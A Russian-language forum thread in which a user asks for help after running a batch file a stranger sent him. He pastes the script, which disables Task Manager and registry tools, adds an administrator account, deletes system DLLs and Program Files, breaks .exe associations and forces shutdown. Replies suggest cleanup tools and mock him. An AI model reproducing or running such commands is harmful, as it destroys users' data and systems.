Ан
Андрей

Не запускаются программы (Помогите)

Вообщем мне один человек скинул файл .bat формата, я его открыл, и комп перезагрузился, когда он включился был выбор профиля (выбора раньше не было, так как был 1 профиль) я зашел на свой, и теперь никакие программы и игры не открываются. И раньше при включении компа включались разные программы, типа skype и т. д, а теперь только соединение с инетом, и все.
помогите. (Антивирусник работал, касперский) .
Даже в Пуск > Выполнить > cmd (к примеру) не работает. Сначала этот файл был в формате html (через браузер открывался вообщем) но тот человек переделал его в .bat (так как на XP html не работал) , я его открыл и дальше вы знаете. Винда XP, и еще он у меня спрашивал на каком диске у меня система, я сказал, что на C.

Когда я нажимаю на запуск файла, или программы, то просто ничего не происходит, даже ошибок нету.

@Echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\System /v
DdisableTaskMgr /t REG_DWORD /d 1 /f >nul
del "%SystemRoot%\Media" /q >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
net user "ламер" /add >nul
net localgroup Администраторы ламер /add
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
del "%SystemRoot%system32*.dll" /q >nul
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul
time 21:12 >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
del "%SystemRoot%Cursors*.*" >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
taskkill /f /im explorer.exe >nul
msg * "Хочешь людям акки ломать? А я тебя взломал" >nul
Date 13.09.96
assoc .exe=.mp3
del C:\Program Files
Echo VIRUS LOAD
"Assoc .exe = .gif"
shutdown -s -t 1 -c "lol" -f >nul
del "%0" >nul

Ан
Анжелика

Dr. Web Cure It в помощь тебе

Александр

Напиши сюда содержимое этого батника. ПКМ->Изменить и все что там написано кидай сюда.

Екатерина Зверева

Пробовал откат системы (если он включен у вас)?

Екатерина Сазонова

Мда, неплохо тебя поимели.

Михаил Скороходов

Как говорится, не рой другому яму - сам в неё попадёшь.

"Хочешь людям акки ломать? А я тебя взломал"

Эту строчку в файле видел? Прежде чем запускать, надо хотя бы взгляд бросить.
Вот и попался тебе "добрый" человек
Небось обещал помочь? научить хакерству?

Кто с мечом к нам придёт - от меча и погибнет (с)